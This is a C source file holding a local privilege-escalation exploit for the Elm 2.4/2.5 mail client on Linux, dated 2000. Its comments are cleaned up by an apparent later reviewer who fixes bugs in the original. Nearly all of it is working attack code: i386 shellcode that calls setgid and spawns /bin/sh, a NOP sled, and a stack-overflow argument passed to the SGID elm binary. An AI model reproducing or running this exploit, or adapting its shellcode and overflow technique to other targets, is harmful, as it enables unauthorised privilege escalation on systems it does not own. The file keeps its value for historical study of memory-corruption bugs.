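/*
 * Linux Elm 2.4/2.5 local exploit by slash / buffer0verfl0w security
 *
 * This will give you a shell (gid=12) if /usr/bin/elm is SGID. Since there
 * isn't a single person who didn't code one of these elm exploits I decided
 * to code my own :) This was tested on slackware 4.0 and redhat 5.1. Offset
 * on slackware -500. So... beware, yet another elm exploit.
 *
 * Shoutouts go to b0f, TESO, ADM, mdma, zsh, FunkySh and all of the people
 * who know me. Dislikes go out to you-know-who: p4riah and h0lmez.
 *
 * Peace out,
 * -- slash - tcsh@b0f.i-p.com - b0f.freebsd.lublin.pl
 *
 * Review notes (not in the original):
 *  - Classic stack smash: the "-f" argument handed to elm is a NOP sled,
 *    shellcode and repeated copies of a guessed stack address.  It is i386
 *    only (int 0x80 shellcode, 32-bit return address, `movl %esp` inline asm)
 *    and needs an executable stack plus a predictable stack address (no
 *    ASLR) on the target -- the norm on the 2000-era distributions above.
 *  - The original shipped with execlp("PATH", ...) -- a string literal, so
 *    it tried to run a program literally named "PATH" instead of the macro.
 *  - The original buffer was never NUL-terminated, so exec read past it.
 *  - The original esp() fell off the end of a non-void function.
 */
#include <errno.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NOPS   0x90           /* x86 NOP: pads the sled in front of the shellcode */
#define LEN    264            /* size of the overflowing argument handed to elm */
#define SC_END 250            /* shellcode ends here; bytes SC_END..LEN-1 are return address */
#define PATH   "/usr/bin/elm" /* path to the SGID program */
#define OFFSET -500           /* default distance below our own stack pointer */

/*
 * i386 Linux, NUL-free: setgid(12); execve("/bin/sh", ...); exit(0).
 * (jmp/call trick fetches the address of the trailing "/bin/sh".)
 */
char shellcode[] =
    "\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3\x0c\xcd\x80\x89\x76\x08\x31\xc0\x88"
    "\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
    "\x89\xd8\x40\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01";

/*
 * Return our current stack pointer (i386 only).
 *
 * The exploit uses it as a stand-in for where elm's stack will be; the NOP
 * sled absorbs the difference between the two processes' layouts.  The
 * original version relied on %eax happening to hold the result after the
 * function ran off its end; this one returns it explicitly.
 */
long esp(void)
{
    uint32_t sp;

    __asm__ volatile("movl %%esp, %0" : "=r"(sp));
    return (long)sp;
}

/*
 * Build the LEN-byte argument and exec elm with it via "-f".
 *
 * argv[1], if present, overrides OFFSET and must be a decimal integer that
 * fits in an int.  Returns 1 on bad input or if the exec fails; on success
 * this process is replaced by elm and does not return.
 */
int main(int argc, char **argv)
{
    char buffer[LEN + 1];       /* +1 so the argv string is NUL-terminated */
    size_t i, sclen;
    int offset = OFFSET;
    long retaddr;
    uint32_t ret32;

    printf("Linux Elm 2.4/2.5 local exploit\n");
    printf("coded by slash / buffer0verfl0w security\n");
    printf(" \n");

    if (argc > 1) {
        char *end;
        long v;

        errno = 0;
        v = strtol(argv[1], &end, 10);
        if (end == argv[1] || *end != '\0' || errno == ERANGE ||
            v < INT_MIN || v > INT_MAX) {
            fprintf(stderr, "usage: %s [offset]\n", argv[0]);
            return 1;
        }
        offset = (int)v;
    }

    /* guess where elm's buffer will sit: a little below our own stack pointer */
    retaddr = esp() - offset;
    ret32 = (uint32_t)retaddr;  /* the target is 32-bit, see esp() */

    printf("Using Offset: %d\n", offset);
    printf("Using return address: 0x%lx\n", retaddr);
    printf("After this run \"reset\" to reset the terminal\n");

    sclen = strlen(shellcode);
    if (sclen > SC_END) {
        fprintf(stderr, "shellcode (%zu bytes) does not fit below offset %d\n",
                sclen, SC_END);
        return 1;
    }

    /* fill the whole buffer with the return address, 4 bytes at a time
     * (memcpy instead of a cast: no alignment or aliasing games) */
    for (i = 0; i + sizeof ret32 <= LEN; i += sizeof ret32)
        memcpy(&buffer[i], &ret32, sizeof ret32);

    /* NOP sled, then the shellcode ending exactly at SC_END */
    memset(buffer, NOPS, SC_END - sclen);
    memcpy(buffer + (SC_END - sclen), shellcode, sclen);
    buffer[LEN] = '\0';

    /* the argv list must end in a null pointer, not a bare int 0 */
    execlp(PATH, "elm", "-f", buffer, (char *)NULL);
    perror("execlp");
    return 1;
}

/* www.hack.co.za [5 September 2000] */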